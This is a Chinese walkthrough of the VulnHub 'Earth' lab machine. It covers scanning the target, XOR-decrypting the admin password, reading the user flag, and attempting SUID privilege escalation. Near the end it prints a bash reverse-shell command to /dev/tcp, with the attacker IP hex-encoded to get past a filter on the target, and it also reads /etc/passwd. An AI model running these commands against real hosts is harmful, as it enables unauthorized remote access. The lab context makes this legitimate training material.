项目地址:https://www.vulnhub.com/entry/the-planets-earth,755/
Nmap扫描主机
发现开启了80和443端口,那么一个是http一个是https协议,访问一下,发现都是显示bad request页面
查看源码,都没什么内容
扫一下目录看看,发现相差无几,但是访问报无此页面
重新扫描一下主机,可以看到两条 DNS 记录,因此需要手动修改 /etc/hosts 信息。
可以看到两条 DNS 记录,因此需要手动修改 /etc/hosts 信息。
windows: C:WindowsSystem32dirversetchosts
Linux: /etc/hosts
配置完后,成功访问
发现一串字符,应该是账号密码之类的,先进行保存
37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d403714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b452402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a
扫描目录
发现登录页面:https://earth.local/admin/login
发现robots.txt文件,访问查看一下,发现一个testingnote文件
但是不知道是图中的哪种格式,手动测试后发现是txt格式,访问testingnotes.txt
经过翻译,得到登录账号:terra
前面页面中获得的应该是密码,尝试进行解密,但是好像没有明显的密码加密特征
回过头重新看,发现有一个testdata.txt的目录信息
访问一下
翻译一下
把我整不会了,看了其他师傅的文章,才发现自己忽略了一个重要信息
从上面的内容可以知道如下信息:
1. terra 为管理员用户名2. 使用 XOR (异或)运算3. 需要将首页的 Previous Messages 与 testdata.txt 做 异或运算,进行解密。
写个简单py脚本,选一个Previous Messages数据,然后与 testdata.txt 进行一下 XOR 运算,得到密钥
import binasciidata1 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"f = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()print(hex(int(data1,16) ^ int(f,16)))
运行后得到以下数据:
0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174ox开头,很明显就是16进制加密,解密得
earthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat字符串后面很多是重复的,去重后,得到密码
earthclimatechangebad4humans成功登录。
可以看到当前用户为apache用户
根据 vulnhub 的描述: There are two flags on the box: a user and root flag which include an md5 hash.我们可以知道有两个flag,一个是user账户下的,另外一个是root账户下的
用find命令寻找flag
find / -name "*flag*"发现一个txt文件
使用命令
cat /var/earth_web/user_flag.txt拿到一个flag
[user_flag_3353b67d6437f07ba7d34afd7d2fc27d]
拿到了user的flag,剩下的就要拿root账户的flag。现在目前就要提权
尝试进行反弹shell
发现禁止远程连接,看了别人的博客讲到将IP地址 十六进制转换即可,具体为什么,我不知道,照搬吧!
(十进制转成十六进制)
反弹shell命令
bash -i >& /dev/tcp/0xc0.0xa8.0x1.0x82/7777 0>&1拿到shell
信息收集一波
查看一波账号密码
cat /etc/passwd
如图所示只有两个用户具有 /bin/bash : root, earth
查看系统信息
uname a
尝试进行suid提权
suid提权介绍:
find / -perm -u=s -type f 2>/dev/null
如图所示根据返回结果,/usr/bin/reset_root 极有可能拿到 root 权限。
直接运行
检查是否存在重置触发器
重置失败,所有触发器不存在
不出所料,失败。
在靶机上调试不了,可以将这个命令下载到 kali 中调试,下载可以利用 nc 传输文件。
先在kali/接收方启动:
然后在靶机上/发送方 启动
翻译过来就是nc连接被拒绝,看了其他相关博客,试了很多种方法,都没法解决,就离谱。实验至此结束。
实验总结:
1、查看nmap信息时要主机是否要配置DNS域名解析
2、仔细对收集到的信息进行查看,不可放过收集到的任何一个信息,不放过任何一个细节
原文始发于微信公众号(GSDK安全团队):Vulhub靶场 -- earth
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论